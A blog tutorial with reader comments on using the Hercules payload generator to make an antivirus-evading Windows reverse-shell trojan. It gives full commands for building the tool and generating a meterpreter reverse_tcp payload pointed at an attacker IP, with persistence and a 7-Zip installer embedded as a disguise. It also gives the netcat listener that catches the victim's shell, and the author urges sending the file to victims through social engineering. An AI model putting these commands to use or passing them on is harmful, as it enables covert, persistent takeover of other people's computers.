Posted on 23 Comments

Hacking Windows 10 with Hercules

WARNING:

This post is for educational purpose only and remember that using this tutorial for any nefarious purpose will land you in prison for three years and a fine of two lakh rupees in India. Concerning other countries, Please refer your respective nation’s Cyber law.

Good news : Regardless of what the title says, this works even on windows 8 and 7

Good evening friends. I wanted to test the security of Windows 10 (actually of its antivirus ). Since remote exploits ceased to exist in Windows operating systems after Windows XP,  it can only be done by sending payloads in portable executables. The biggest challenge in sending these  malicious portable executables is bypassing its security mechanisms. Enter Hercules.

Hercules  is a special payload generator that can bypass all antivirus software. It has features like persistence and keylogger which make it too cool. Named after a Greek Hero, Hercules stands up for its name. In our testing, none of the antivirus was able to detect payload generated by Hercules. Now let us see how Hercules can be used to hack Windows 10 . In Kali Linux, open a terminal and type command git clone https://github.com/EgeBalci/Hercules to clone Hercules into Kali Linux.

hercules1

The tool is cloned into directory called Hercules. Navigate into that directory and view the contents of the directory as shown below. There is a directory called SOURCE. Move into that directory. There should be a file called HERCULES.go.

hercules2

Now type command go build HERCULES.go  to build this file. Remember Linux is very strict, so be careful with uppercase and lowercase. Once you run that command, we will get another file with the same name but without any extension as shown below.

hercules3

Now its time to create our payload. Type command,

./HERCULES 192.168.25.146 4444 -p windows/meterpreter/reverse_tcp -a x86 -l dynamic 

Let me explain this command.

192.168.25.146 – IP address of our attacker system ( in our case Kali Linux )

4444 – the port number over which we want our victim system to connect to us.

-p – payload ( in this case, windows/meterpreter/reverse_tcp )

-a – architecture of the payload ( 64 bits or 32 bits )

-l – linking ( static or dynamic, dynamic linking reduces the payload size )

Hit on Enter. Our payload is created in the same directory.

hercules4

Our payload’s name is payload.exe. Type “ls”  as shown below. Now send this file to our victim using your creativity.

hercules5

On our Kali Linux, type command nc -l -p 4444. We are opening a netcat session on port 4444 ( the same port we set up above). Now when the user clicks on our payload, we will get the remote system’s shell as shown below.

hercules6

Type command help to see all the commands we can execute on our target system.

hercules7

For example, type command systeminfo to see all the system settings of our target. This was pretty simple. But this is a one time session, which means once you get out of this session you are disconnected from your victim.

hercules8

So let’s add a little bit reality to our payload this time. Now we will add two things:persistence and embedding.

–persistence – Once our payload is executed by the victim, it will continually try to connect to our attacker system. So we can end the session and start it once again. The only condition is our victim’s system should be on and of course we should be listening.

–embed – we will add a genuine executable into our payload. Type command

./HERCULES 192.168.25.146 4444 -p windows/meterpreter/reverse_tcp -a x86 -l dynamic –persistence –embed=/root/Desktop/7z1602.exe 

Here we are embedding 7zip into our payload. Remember we need to send the payload created in SOURCE directory to our victim.

hercules9

So when victim clicks on our payload to install it, UAC will prompt this window( the user should get a whiff here, if he is aware ).

hercules10

When the user clicks on “yes”, the installation will progress normally on the victim’s system.

hercules11

And on our attacker system, we should have already got the victim’s shell as shown below. As I already told, this is a persistent connection. Disconnect the session by typing ‘CTRL+C” and connect again with nc -l -p 4444 to get the session back.  Hope that was helpful. If you have any queries or doubts, please feel free to leave your comments.

hercules12

23 thoughts on “Hacking Windows 10 with Hercules

  1. Hello,

    Thanks for such great article.

    I wanted to ask what if the victim rebooted his/her machine? does presistent option reconnects to the attacker machine even after a reboot or a shutdown?

    Much Regards
    Abdullah

    1. Yes Abdullah, that is the original concept of persistence. Welcome

  2. IS THE A WAY TO PUT A NO-IP ADDRESS INSTEAD?

    1. You mean without the IP. If it is what you mean, then no. You need an IP to connect back.

      1. I mean put a noip dns. Is itgoing ppossible

  3. This is how to use it, but I was more interested in your tests against various AV vendor products. How about doing a post on that, and perhaps why hercules works?

    1. Ok Wayne, have to look at your suggestion. There may be a sequel.

  4. [email protected]
    How to set a dns instead of an ip?

  5. […] See how to hack Windows 10 with Hercules  […]

  6. Getting stuck like this

    [email protected]:~/Hercules/SOURCE# go build HERCULES.go
    HERCULES.go:13:8: cannot find package “github.com/fatih/color” in any of:
    /usr/lib/go/src/pkg/github.com/fatih/color (from $GOROOT)
    ($GOPATH not set)

    please advise

    1. @Anupam, try command “go get github.com/fatih/color” and retry the above command.

  7. I’m just getting go: no such command 🙁

    1. @tracker10, it seems golang is not installed in your system. Install Golang first.

  8. I type go env and the terminal shows this GOARCH=”386″
    GOBIN=””
    GOCHAR=”8″
    GOEXE=””
    GOHOSTARCH=”386″
    GOHOSTOS=”linux”
    GOOS=”linux”
    GOPATH=”/usr/lib/go/src”
    GORACE=””
    GOROOT=”/usr/lib/go”
    GOTOOLDIR=”/usr/lib/go/pkg/tool/linux_386″
    CC=”gcc”
    GOGCCFLAGS=”-fPIC -m32 -pthread -fmessage-length=0″
    CXX=”g++”
    CGO_ENABLED=”1″

    1. @Shadowwalker, There is another howto on my blog regarding hercules which fixes all the problems you are facing. Search for “windows hacking with hercules”.

  9. hi friends, I want to ask, if the .exe file that can be detected by antivirus

    1. @fadil, At the time we made the payload, it was fully undetectable (FUD). As time passes, some antivirus may detect it. The relation between malware and anti-malware is like between newt and garter snake and need to be discussed elaborately. But the tool is constantly updated.

  10. having issues installing go period….so i cant get past that or accomplish jack….

    1. Hi @Tweaker_Roadhouse, check this howto

  11. Hi all..as usuale the Victim have to be a stupid nan
    Who put on his sistema a Troian or a simil-virus…
    I read a Lot of stuff all need a week sistema and of a stupido user…blanda
    Have you somestuff to use against a Very protect system

    1. Hi Espmat. Thanks for your frank opinion. At the beginning of my career in Cyber security, even I used to think exactly like you. As time progressed, I learnt that hacking is never about the target machine or the tools we are using. It’s in the mind. The hacking world has coined a term for it “Social Engineering”. It’s convincing the user to do what he will not do normally.
      You are right. The victim will not click on a virus if we send it normally. But when a user is lured to click on our malicious file using a ruse, it will work. Social engineering always works. Many recent data breaches are a testimony to this.

  12. […] we have a scenario where we got meterpreter access to a Windows 10 system ( See how to hack Windows 10 with Hercules and see how to hack Windows 10 with hta […]

  13. […] See how to hack Windows 10 with Hercules  […]

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.